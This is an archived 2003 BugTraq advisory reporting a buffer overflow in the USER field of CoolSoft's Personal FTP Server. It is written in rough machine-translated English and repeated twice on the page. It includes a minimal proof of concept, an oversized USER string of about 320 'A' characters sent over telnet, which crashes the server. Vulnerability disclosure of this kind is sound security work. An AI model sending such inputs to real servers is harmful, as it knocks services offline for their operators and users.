BugTraq
Back to list
|
Post reply
Personal FTP Server
Mar 31 2003 10:37AM
subj (r2subj3ct dwclan org)
---------------------------------------
Product : Personal FTP Server
Version : ?
OSystem : Windows
Authors : CoolSoft
WebSite : http://www.cooolsoft.com
Problem :
* Buffer Overflow in field USER
---------------------------------------
Description:
------------
eng:
====
Overflow of the buffer occurs in field USER if contain with field USER to
transfer more than 320 bytes of dust.
The ambassador realization of the above described operation, the server
simply will fall, and will not respond as on client,
And any other searches. To close server it is possible to awake only end
of process
Exploit:
--------
*************************************
>>Telnet 127.0.0.1:21
220 Personal FTP Server ready
>>USER AAAAAAA...AAAAA [320b]
*************************************
Contacts:
---------
r2subj3ct (at) dwclan (dot) org [email concealed]
subj.24h.to (www.dwcgr0up.com/subj/)
www.dwcgr0up.com
irc.dwcgr0up.biz #dwc
Thanks:
-------
DHG, GipsHack, Netp0is0n, de1irium, r00tc0de, f0kp, exploit.ru,
security.nno.ru
DethSpirit, r4ShRaY, D4rkGr3y, 3APA3A, Moby, Orb, Foster, Owned, prior,
Demon.
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
---------------------------------------
Product : Personal FTP Server
Version : ?
OSystem : Windows
Authors : CoolSoft
WebSite : http://www.cooolsoft.com
Problem :
* Buffer Overflow in field USER
---------------------------------------
Description:
------------
eng:
====
Overflow of the buffer occurs in field USER if contain with field USER to
transfer more than 320 bytes of dust.
The ambassador realization of the above described operation, the server
simply will fall, and will not respond as on client,
And any other searches. To close server it is possible to awake only end
of process
Exploit:
--------
*************************************
>>Telnet 127.0.0.1:21
220 Personal FTP Server ready
>>USER AAAAAAA...AAAAA [320b]
*************************************
Contacts:
---------
r2subj3ct (at) dwclan (dot) org [email concealed]
subj.24h.to (www.dwcgr0up.com/subj/)
www.dwcgr0up.com
irc.dwcgr0up.biz #dwc
Thanks:
-------
DHG, GipsHack, Netp0is0n, de1irium, r00tc0de, f0kp, exploit.ru,
security.nno.ru
DethSpirit, r4ShRaY, D4rkGr3y, 3APA3A, Moby, Orb, Foster, Owned, prior,
Demon.
[ reply ]